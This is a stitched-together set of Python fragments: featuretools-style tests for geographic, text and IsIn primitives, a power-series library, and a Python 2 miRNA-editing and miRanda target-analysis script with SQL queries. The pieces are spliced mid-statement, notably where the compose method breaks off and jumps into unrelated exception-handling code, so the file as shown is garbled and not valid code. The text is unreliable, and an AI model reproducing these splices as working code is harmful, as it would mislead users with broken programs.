for i, v, in enumerate(real_lats):
assert v == latvalues[i]
for i, v, in enumerate(real_lons):
assert v == lonvalues[i]
def test_latlong_with_nan(pd_es):
df = pd_es['log']
df['latlong'][0] = np.nan
df['latlong'][1] = (10, np.nan)
df['latlong'][2] = (np.nan, 4)
df['latlong'][3] = (np.nan, np.nan)
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
latitude = ft.Feature(log_latlong_feat, primitive=Latitude)
longitude = ft.Feature(log_latlong_feat, primitive=Longitude)
features = [latitude, longitude]
fm = ft.calculate_feature_matrix(entityset=pd_es, features=features)
latvalues = fm[latitude.get_name()].values
lonvalues = fm[longitude.get_name()].values
assert len(latvalues) == 17
assert len(lonvalues) == 17
real_lats = [np.nan, 10, np.nan, np.nan, 20, 0, 1, 2, 3, 0, 0, 5, 0, 7, 14, np.nan, np.nan]
real_lons = [np.nan, np.nan, 4, np.nan, 8, 0, 1, 2, 3, 0, 0, 2, 0, 3, 6, np.nan, np.nan]
assert np.allclose(latvalues, real_lats, atol=0.0001, equal_nan=True)
assert np.allclose(lonvalues, real_lons, atol=0.0001, equal_nan=True)
def test_haversine(pd_es):
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features,
instance_ids=range(15))
values = df[haversine.get_name()].values
real = [0, 525.318462, 1045.32190304, 1554.56176802, 2047.3294327, 0,
138.16578931, 276.20524822, 413.99185444, 0, 0, 525.318462, 0,
741.57941183, 1467.52760175]
assert len(values) == 15
assert np.allclose(values, real, atol=0.0001)
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine(unit='kilometers'))
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features,
instance_ids=range(15))
values = df[haversine.get_name()].values
real_km = [0, 845.41812212, 1682.2825471, 2501.82467535, 3294.85736668,
0, 222.35628593, 444.50926278, 666.25531268, 0, 0,
845.41812212, 0, 1193.45638714, 2361.75676089]
assert len(values) == 15
assert np.allclose(values, real_km, atol=0.0001)
error_text = "Invalid unit inches provided. Must be one of"
with pytest.raises(ValueError, match=error_text):
Haversine(unit='inches')
def test_haversine_with_nan(pd_es):
# Check some `nan` values
df = pd_es['log']
df['latlong'][0] = np.nan
df['latlong'][1] = (10, np.nan)
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features)
values = df[haversine.get_name()].values
real = [np.nan, np.nan, 1045.32190304, 1554.56176802, 2047.3294327, 0,
138.16578931, 276.20524822, 413.99185444, 0, 0, 525.318462, 0,
741.57941183, 1467.52760175, np.nan, np.nan]
assert np.allclose(values, real, atol=0.0001, equal_nan=True)
# Check all `nan` values
df = pd_es['log']
df['latlong2'] = np.nan
pd_es.replace_dataframe(dataframe_name='log', df=df)
log_latlong_feat = ft.Feature(pd_es['log'].ww['latlong'])
log_latlong_feat2 = ft.Feature(pd_es['log'].ww['latlong2'])
haversine = ft.Feature([log_latlong_feat, log_latlong_feat2],
primitive=Haversine)
features = [haversine]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features)
values = df[haversine.get_name()].values
real = [np.nan] * pd_es['log'].shape[0]
assert np.allclose(values, real, atol=0.0001, equal_nan=True)
def test_text_primitives(es):
words = ft.Feature(es['log'].ww['comments'], primitive=NumWords)
chars = ft.Feature(es['log'].ww['comments'], primitive=NumCharacters)
features = [words, chars]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(15)),
index='id',
sort_index=True)
word_counts = [514, 3, 3, 644, 1268, 1269, 177, 172, 79,
240, 1239, 3, 3, 3, 3]
char_counts = [3392, 10, 10, 4116, 7961, 7580, 992, 957,
437, 1325, 6322, 10, 10, 10, 10]
word_values = df[words.get_name()].values
char_values = df[chars.get_name()].values
assert len(word_values) == 15
for i, v in enumerate(word_values):
assert v == word_counts[i]
for i, v in enumerate(char_values):
assert v == char_counts[i]
def test_isin_feat(es):
isin = ft.Feature(es['log'].ww['product_id'], primitive=IsIn(list_of_outputs=["toothpaste", "coke zero"]))
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_other_syntax(es):
isin = ft.Feature(es['log'].ww['product_id']).isin(["toothpaste", "coke zero"])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_other_syntax_int(es):
isin = ft.Feature(es['log'].ww['value']).isin([5, 10])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [False, True, True, False, False, False, False, False]
v = df[isin.get_name()].tolist()
assert true == v
def test_isin_feat_custom(es):
def pd_is_in(array, list_of_outputs=None):
if list_of_outputs is None:
list_of_outputs = []
return array.isin(list_of_outputs)
def isin_generate_name(self, base_feature_names):
return u"%s.isin(%s)" % (base_feature_names[0],
str(self.kwargs['list_of_outputs']))
IsIn = make_trans_primitive(
pd_is_in,
[ColumnSchema()],
ColumnSchema(logical_type=Boolean),
name="is_in",
description="For each value of the base feature, checks whether it is "
"in a list that is provided.",
cls_attributes={"generate_name": isin_generate_name})
isin = ft.Feature(es['log'].ww['product_id'], primitive=IsIn(list_of_outputs=["toothpaste", "coke zero"]))
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
isin = ft.Feature(es['log'].ww['product_id']).isin(["toothpaste", "coke zero"])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [True, True, True, False, False, True, True, True]
v = df[isin.get_name()].tolist()
assert true == v
isin = ft.Feature(es['log'].ww['value']).isin([5, 10])
features = [isin]
df = to_pandas(ft.calculate_feature_matrix(entityset=es, features=features, instance_ids=range(8)),
index='id',
sort_index=True)
true = [False, True, True, False, False, False, False, False]
v = df[isin.get_name()].tolist()
assert true == v
def test_isnull_feat(pd_es):
value = ft.Feature(pd_es['log'].ww['value'])
diff = ft.Feature(value, groupby=ft.Feature(pd_es['log'].ww['session_id']), primitive=Diff)
isnull = ft.Feature(diff, primitive=IsNull)
features = [isnull]
df = ft.calculate_feature_matrix(entityset=pd_es, features=features, instance_ids=range(15))
correct_vals = [True, False, False, False, False, True, False, False,
False, True, True, False, True, False, False]
values = df[isnull.get_name()].tolist()
assert correct_vals == values
def test_percentile(pd_es):
v = ft.Feature(pd_es['log'].ww['value'])
p = ft.Feature(v, primitive=Percentile)
feature_set = FeatureSet([p])
calculator = FeatureSetCalculator(pd_es, feature_set)
df = calculator.run(np.array(range(10, 17)))
true = pd_es['log'][v.get_name()].rank(pct=True)
true = true.loc[range(10, 17)]
for t, a in zip(true.values, df[p.get_name()].values):
assert (pd.isnull(t) and pd.isnull(a)) or t == a
def test_dependent_percentile(pd_es):
v = ft.Feature(pd_es['log'].ww['value'])
p = ft.Feature(v, primitive=Percentile)
p2 = ft.Feature(p - 1, primitive=Percentile)
feature_set = FeatureSet([p, p2])
calculator = FeatureSetCalculator(pd_es, feature_set)
df = calculator.run(np.array(range(10, 17)))
true = pd_es['log'][v.get_name()].rank(pct=True)
true = true.loc[range(10, 17)]
# file: pwrsrs.py
from fractions import Fraction as F
from itertools import count, islice, repeat, chain, starmap
import math
try:
from itertools import izip as zip
from itertools import imap as map
except ImportError: # will be 3.x series
pass
pstestlimit = 5
def memoizedGenerator( gen ):
_iter = gen()
_cache = []
def _gen():
for n in count():
if n < len(_cache):
yield _cache[n]
else:
term = next(_iter)
_cache.append(term)
yield term
return _gen
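# A hedged usage sketch (names illustrative): memoizedGenerator wraps a
# zero-argument generator factory so that repeated iteration replays cached
# terms instead of recomputing them. This matters below, where recursive
# definitions such as _mul and _rdiv iterate over themselves.
#
# >>> calls = []
# >>> @memoizedGenerator
# ... def nats():
# ...     for n in count():
# ...         calls.append(n)
# ...         yield n
# >>> list(islice(nats(), 3))
# [0, 1, 2]
# >>> list(islice(nats(), 3))
# [0, 1, 2]
# >>> calls   # each term was computed only once
# [0, 1, 2]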
def num_to_str( term ):
if isinstance(term, float):
return "\t% .3e" % term
else:
return "\t"+str(term)
class PowerSeries(object):
def __init__(self, g=None):
self.__g = g
def __eq__(self, entry):
print("Warning: comparing powerseries!")
return Equal( self, entry )
def __iter__( self ):
return self.__g() if self.__g else repeat(0)
def __str__(self):
return self.getstr()
def getstr(self, nums=[], term_to_str=num_to_str):
def gen_str():
if isinstance(nums, int):
n = nums
r = nums
else:
n = nums[0] if nums else pstestlimit
r = nums[1:] if nums else []
is_pps = isinstance(self.zero, PowerSeries)
for term in islice(self, n):
if is_pps:
yield term.getstr(r) + "\n"
else:
yield term_to_str(term) + ", "
return "".join(gen_str()) + "..."
def __getitem__(self, key):
"""
Access items of power series with an index or a slice.
Warning: Access by slice just returns a slice and not
a list or tuple.
Use list(P[:10]) to get a list of the first 10 coefficients.
"""
if isinstance(key, slice):
return islice(self, key.start, key.stop, key.step)
else:
return next(islice(self, key, None))
def deep_map( self, func, n=1 ):
"""
Helper function that maps a function over the power
series at nestedness level n. deep_map is essentially
an iterated map used to handle multivariate
power series.
"""
if n == 0:
return func(self)
if n == 1:
@memoizedGenerator
def _deep_map():
return map( func, self )
return PowerSeries( _deep_map )
else:
return self.deep_map( lambda x: x.deep_map(func, n-1) )
@property
def ord2exp(self):
"""
Converts an ordinary generating function to an
exponential generating function.
Example:
>>> Equal((1/(1-X)).ord2exp, exp(X))
True
"""
def _ord2exp(f=1):
for n,term in enumerate(self):
yield F(term, f)
f*= n+1
return PowerSeries(_ord2exp)
@property
def exp2ord(self):
"""
Converts an exponential generating function to an
ordinary generating function.
Example:
>>> Equal(exp(X).exp2ord, 1/(1-X))
True
"""
def _exp2ord(f=1):
for n,term in enumerate(self):
yield term * f
f*= n+1
return PowerSeries(_exp2ord)
@property
def zero(self):
"""
Returns the constant term of the power series.
"""
for term in self:
return term
@property
def tail(self):
"""
Returns everything except the constant term as a
new power series.
"""
def _tail():
return islice(self, 1, None)
return PowerSeries(_tail)
@property
def xmul(self):
"""
Shifts the coefficients of the power series P by one
term such that P.xmul has 0 as constant term.
"""
def _xmul():
return chain( ( self.zero*0,), self )
return PowerSeries(_xmul)
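# In symbols: if P = a0 + a1*x + a2*x**2 + ..., then P.xmul = x*P =
# 0 + a0*x + a1*x**2 + ... The generator prepends self.zero*0 rather than a
# bare 0 so the new constant term has the same type (scalar or nested
# PowerSeries) as the existing coefficients.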
def __add__(self, entry):
"""
Implements power series addition.
"""
if is_powerseries(entry):
@memoizedGenerator
def _add():
return starmap( lambda a,b: a+b, zip( self, entry ) )
else:
def _add():
return chain( map( lambda a: a+entry, islice(self, 0, 1) ), islice(self, 1, None) )
return PowerSeries(_add)
__radd__ = __add__
def __sub__(self, entry):
return self + (-entry)
def __rsub__(self, entry):
return entry + (-self)
def __neg__(self):
return self.deep_map( lambda x: -x )
def __mul__(self, entry):
"""
Implements multiplication of power series. Only minor
modifications to P. Donis' original code were necessary
to handle multivariate power series.
Example:
>>> Equal((exp(X-Z)/(1-X)) * (exp(Y+Z)/(1-Y)), exp(X+Y)/(1-X-Y+X*Y))
True
"""
if not is_powerseries(entry):
if entry == 1:
return self
elif entry == 0:
if is_powerseries(self.zero):
z = self.zero*0
def _z():
return repeat( z )
return PowerSeries(_z)
else:
return PowerSeries()
else:
return self.deep_map( lambda x: x*entry )
@memoizedGenerator
def _mul():
f0 = self.zero
g0 = entry.zero
yield f0 * g0
F = self.tail
G = entry.tail
mterms = [(F * G).xmul]
if is_powerseries(f0) or f0 != 0:
f0G = G.deep_map( lambda x: x*f0 )
mterms.append(f0G)
if is_powerseries(g0) or g0 != 0:
g0F = F.deep_map( lambda x: x*g0 )
mterms.append(g0F)
for terms in zip(*mterms):
yield sum(terms)
return PowerSeries(_mul)
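# Sketch of the identity behind _mul (not part of the original comments):
# writing self = f0 + x*F and entry = g0 + x*G gives
#     self*entry = f0*g0 + x*(f0*G + g0*F + x*(F*G)),
# which is exactly the streams summed above: (F*G).xmul plus the scaled
# tails f0*G and g0*F, with a vanishing f0 or g0 dropping its stream.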
__rmul__ = __mul__
def __truediv__(self, entry):
if is_powerseries(entry):
return entry.__rtruediv__(self)
elif entry == 1:
return self
elif entry == 0:
raise ValueError("Zero division error")
else:
return self * (F(1, 1) / entry)
def __rtruediv__(self, entry):
"""
Implements division of power series P/Q. If Q has
an integer constant term != 1, then P/Q will be given
as a power series of Fractions even if P is an integer
power series.
Examples:
>>> A = 10/ (1 - X)
>>> Equal(A, 1/(1-X) * 10 )
True
>>> B = 1 / (1 - X - X*Y)
>>> Equal(1/B, 1-X-X*Y)
True
>>> C = 100*solve( Y - X*exp(X) )[0].tail
>>> Equal( C/C, 1 )
True
"""
@memoizedGenerator
def _rdiv():
f0 = self.zero
if isinstance(f0, int):
recip = F(1, f0)
else:
recip = 1 / f0
if not is_powerseries(entry):
yield entry * recip
for term in ( (self.tail * R).deep_map( lambda x: -x*recip ) ):
yield term
else:
yield entry.zero * recip
for term in ( (entry.tail-self.tail * R).deep_map( lambda x: x*recip ) ):
yield term
R = PowerSeries(_rdiv)
return R
__div__ = __truediv__
__rdiv__ = __rtruediv__
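# Sketch of the recursion behind _rdiv: let R = entry/self with
# self = f0 + x*F. Then self*R = entry gives R = (entry - x*F*R)/f0,
# i.e. the constant term entry.zero/f0 (or entry/f0 for a scalar) followed
# by the tail terms the generator yields. Binding R before the generator
# runs is safe because the recursion only consumes terms of R that were
# already produced.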
def __pow__( self, alpha ):
"""
Implements taking powers of power series. For non-negative integer
exponents there are no restrictions on the power series. For all
other exponents the power series needs to have a non-zero constant
coefficient. This function is based on P. Donis' code.
Examples:
>>> Equal(X**0, I)
True
>>> Equal(X*X, X**2)
True
>>> Equal( log((1/(1+X))**(F(3,2))), -F(3,2)*log(1+X))
True
>>> Equal(exp( X + 3*Y )**F(-4,7), exp( -F(4,7) * (X + 3*Y) ))
True
"""
f0 = self.zero
if not is_powerseries(f0) and f0 == 0:
if isinstance(alpha, int) and alpha >= 0:
if alpha == 0:
return self*0 + 1
@memoizedGenerator
def _pow():
for e in repeat(0, alpha):
yield e
for term in self.tail ** alpha:
yield term
return PowerSeries(_pow)
else:
raise ValueError("Can't raise powerseries with vanishing first term to non positive integer power")
c0 = self.zero**alpha if is_powerseries(self.zero) or self.zero != 1 else 1
@memoizedGenerator
def _pow():
for term in integral(alpha * P * D(self) / self, c0 ):
yield term
P = PowerSeries(_pow)
return P
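# Sketch of the general case: for P = self**alpha, logarithmic
# differentiation gives D(P) = alpha * P * D(self) / self, and P is
# recovered by integrating with constant term c0 = self.zero**alpha.
# D and integral are assumed to be this module's derivative and
# antiderivative helpers, defined elsewhere in the file.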
def compose(self, *args):
"""
Implements general power series composition. The first
argument is composed with the first variable or nestedness
level, the second with the second nestedness level and so on.
In power series symbols, compose with
arguments f_1, ..., f_n calculates
P( f_1(x,y,z), ..., f_n(x,y,z), x, y, z, ...)
Note that we continue with x,y,z if we have more variables
than arguments.
For instance,
>>> P = X + 3*Y
>>> Equal( P(Y, exp(X)-1), Y + 3*exp(X)-3 )
True
Composition can also be used to shuffle the variables of power
series if necessary:
>>> P = X*exp(Y)
>>> Equal( P(Y, X), Y*exp(X) )
True
Furthermore, we can reduce the depth of the power series by
identifying different variables with each other.
>>> Equal( P(X,X), X*exp(X) )
True
Note that P(X) gives the same result as P(X,X) if P is a bivariate
power series.
Examples:
>>> Equal((1/(1-X-X*Y))(X,X), 1/(1-X-X**2))
True
>>> A = exp(X)
>>> B = log(1/(1-X))
>>> Equal( A(B), 1/(1-X) )
True
>>> Equal((1/(1-X-X*Y))(Y,X), 1/(1-Y-Y*X))
True
>>> Equal((1/(1-X-X*Y))(Y), 1/(1-Y-Y*X))
True
>>> Equal((1/(1-X-Z))(X,Y,X*Y), 1/(1-X-X*Y))
True
>>> Equal((1/(1-X))(Y), 1/(1-Y))
True
"""
n = len(args)
try:
k,a = next( ( (k,a) for k,a in enumerate(args) if not is_powerseries(a) ) )
if a == 0:
if n > 1:
return self.deep_map( lambda x: x.zero, k )( *(args[:k] + args[k+1:]) )
else:
return self.zero
else:
raise ValueError("Can't calculate powerseries at non-zero value")
except StopIteration:
pass
get_zero = lambda d: d.zero if is_powerseries(d) else d
get_D = lambda d: D(d) if is_powerseries(d) else 0
@memoizedGenerator
def _compose():
G = ( self.deep_map(
except Exception, e:
print e
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(newTPair[key][0])+'\t'+str(newTPair[key][1])+'\t'+utr[newTPair[key][0]-10:newTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(dieList): #high confidence die targets
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[dieTPair[key][0]-25:dieTPair[key][1]+20].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status == 1:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
except:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(step2Run):
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status != 1.0 and status != 0:
score = score[1]
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(newTPair[key][0])+'\t'+str(newTPair[key][1])+'\t'+utr[newTPair[key][0]-10:newTPair[key][1]+25].strip()+'\n'
result.append(line)
elif status == 1.0:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\t'+item+'\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
except:
line = mir+'\t'+sig+'\t'+str(jobId)+'\tRAW\traw\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t \t \t \t \t'+str(stepTPair[key][0])+'\t'+str(stepTPair[key][1])+'\t'+utr[stepTPair[key][0]-10:stepTPair[key][1]+25].strip()+'\n'
result.append(line)
for key, utrSym in enumerate(tiList):
utr = getUTR(utrSym)
if utr != 0:
try:
score = editingAnalysis(fasta, utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip())
if score != 0:
status = score[0]
if status == 1:
item = 'raw'
elif status == 2:
item = 'a2g & a2t'
elif status == 3:
item = 'a2g'
elif status == 4:
item = 'a2t'
else:
return -1
if status != 1.0 and status != 0:
score = score[1]
regulated.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tNEW\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
elif status == 1.0:
score = score[1]
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\t'+item+'-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t'+str(score[0])+'\t'+str(score[1])+'\t'+str(score[2])+'\t'+str(score[3])+'\t'+str(dieTPair[key][0])+'\t'+str(dieTPair[key][1])+'\t'+utr[dieTPair[key][0]-10:dieTPair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
else:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t-so\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
except:
released.append(tgMapLibrary[utrSym])
line = mir+'\t'+sig+'\t'+str(jobId)+'\tDIE\ta2t\t'+tgMapLibrary[utrSym]+'\t'+utrSym+'\t-\t-\t-\t-\t'+str(tIssuePair[key][0])+'\t'+str(tIssuePair[key][1])+'\t'+utr[tIssuePair[key][0]-10:tIssuePair[key][1]+25].strip()+'\n'
result.append(line)
fileA = open(outFile, 'w')
fileA.writelines(result)
fileA.close()
query = """LOAD DATA LOCAL INFILE '%s' INTO TABLE %s (`mirna`, `sig`, `job`, `tag`, `way`, `gene_symbol`, `transcript_id`, `dg_duplex`, `dg_binding`, `dg_duplex_seed`, `dg_binding_seed`, `utr_start`, `utr_end`, `utr3`);""" % (outFile, getConfig("datasets", "mirs"))
cursor.execute(query)
cnx.commit()
#new_t, old_t, com_t, dif_t, sig
return len(newList), len(step2Run)+len(dieList), len(step2Run), len(dieList), sig
def loadUTRSeq():
global utrLibrary
tmp = file(getConfig('datasets', 'utrLibrary'), 'rb')
utrLibrary = pickle.load(tmp)
tmp.close()
def loadTGMap():
global tgMapLibrary
tmp = file(getConfig('datasets', 'tgLibrary'), 'rb')
tgMapLibrary = pickle.load(tmp)
tmp.close()
def convertRefGenomeMatureR():
query = "SELECT * FROM miediting WHERE mirna LIKE '%p';"
cursor.execute(query)
for (rec_id, chromosome, position, gene, strand, mirna, seed_pos, annot1, annot2, alu, raw_seq, a2g, a2t, a2c) in cursor:
queryCursor = cnx.cursor()
query = "SELECT start, end FROM mirgenome WHERE chromosome='%s' AND strand='%s' AND start<=%d AND start>=%d" % (chromosome, strand, int(position) - 1, int(position) - 7)
queryCursor.execute(query)
try:
data = queryCursor.fetchall()
if (len(data)):
query = "UPDATE miediting SET seed_pos=%d WHERE rec_id=%d" % (int(position) - int(data[0][0]) , rec_id)
queryCursor.execute(query)
cnx.commit()
except :
print query
def parsemiRanda(file, sig, jobId):
with open(file) as f:
all = f.read()
n = re.sub("{trick}", "\t"+sig+"\t"+str(jobId)+"\t", all)
fw = open(file, "w")
fw.write(n)
fw.close()
def whichMiRNA(chr, pos):
"""Find which miRNA it is"""
global mirTable
miRNA = None
for hit in mirTable.fetch(reference=chr, start=int(pos)-1, end=int(pos), parser=pysam.asGTF()):
chr, source, type, start, end, score, strand, phase, attributes = hit
start = int(start)
end = int(end)
attributes = attributes.split(';')
miRNA = attributes[2].split('=')[1]
seq = attributes[4].split('=')[1]
if miRNA != None:
if strand == '+':
seed = 1 if isInSeedRegion(start, pos, strand) else 0
return (miRNA, start, seed, strand, seq)
else:
seed = 1 if isInSeedRegion(end, pos, strand) else 0
return (miRNA, end, seed, strand, seq)
return 0
def miRanda2gene(file, allList=[]):
newRows = []
with open(file) as f:
rows = f.readlines()
i = 0
for row in rows:
ele = row.split()
query = "SELECT * FROM utr3 WHERE infasta = '%s';" % ele[4]
cursor.execute(query)
geneSymbol = cursor.fetchone()
if len(allList) > 0:
if geneSymbol:
if geneSymbol[6] not in allList:
continue
if (geneSymbol == None and ele[4] != "NA"):
geneSymbol = "Unknown("+ele[4]+")"
newRows.append(row.replace(ele[4], ele[4].replace("hg38_refGene_","")+"\t"+geneSymbol))
elif ele[4] != "NA" :
newRows.append(row.replace(ele[4], ele[4].replace("hg38_refGene_","")+"\t"+str(geneSymbol[6])))
i = i + 1
fw = open(file, "w")
fw.writelines(newRows)
fw.close()
def isUnexpressed(expressionTable, gene_symbol):
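# Return codes, inferred from the branches below: 0 -> expressed,
# 1 -> unexpressed (zero FPKM/TPM) or no expression column present,
# 2 -> gene not found in the expression table.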
cols = list(expressionTable.columns)
record = expressionTable[expressionTable['gene_short_name'] == gene_symbol]
if 'FPKM' in cols:
value = list(record['FPKM'])
elif 'TPM' in cols:
value = list(record['TPM'])
else:
return 1
if len(value) == 0:
return 2
else:
if float(value[0]) == 0:
return 1
else:
return 0
def diffSetsBymiRanda(file, sig):
mut = []
wt = []
rows = []
taggedWithWay = []
file_handler = open(file, 'r')
rows = file_handler.readlines()
'''
with open(file) as f:
rows = f.readlines()
for row in rows:
row = row.split()
if row[3] == "RAW":
wt.append(row[4])
else:
mut.append(row[4])
'''
for row in rows:
row = row.split()
if row[3] == "RAW":
wt.append(row[4])
else:
mut.append(row[4])
newT = set(mut).difference(set(wt))
dieT = set(wt).difference(set(mut))
comT = set(wt).intersection(set(mut))
for row in rows:
items = row.split('\t')
if items[4] in newT:
regulated.append(items[4])
row = row.replace(items[4], 'NEW\t'+items[4])
elif items[4] in dieT:
released.append(items[4])
row = row.replace(items[4], 'DIE\t'+items[4])
else:
row = row.replace(items[4], 'RAW\t'+items[4])
taggedWithWay.append(row)
fp = open(file, mode='w')
fp.writelines(taggedWithWay)
fp.close()
#mut = list(set(mut))
#wt = list(set(wt))
#a.difference(b) --> in a not in b
#diff = list(set(mut).difference(set(wt)))
#union = list(set(mut).intersection(set(wt)))
#for di in diff:
# query = """INSERT INTO `miranda_diff` (`sig`, `gene_symbol`) VALUES ("%s", "%s");""" % (sig, di)
# cursor.execute(query)
# cnx.commit()
return (len(mut), len(wt), len(comT), len(dieT))
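# A worked example of the set logic above (gene names illustrative): if the
# edited run ("mut") targets {A, B, C} and the reference run ("wt") targets
# {B, C, D}, then newT = {A} (gained targets, tagged NEW), dieT = {D}
# (lost targets, tagged DIE) and comT = {B, C} (unchanged, tagged RAW).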
def uniqueTopmiRanda(miRandaOP, newT=[], dieT=[]):
file = open(miRandaOP, 'r')
rawSet = {}
a2gSet = {}
a2tSet = {}
rawIndex = {}
a2gIndex = {}
a2tIndex = {}
uniqueFile = file.readlines()
for k, line in enumerate(uniqueFile):
items = line.split('\t')
if items[3] == 'RAW':
if rawSet.has_key(items[4]):
if rawSet[items[4]] > float(items[5]):
continue
rawSet[items[4]] = float(items[5])
rawIndex[items[4]] = k
elif items[3] == 'I2G':
if a2gSet.has_key(items[4]):
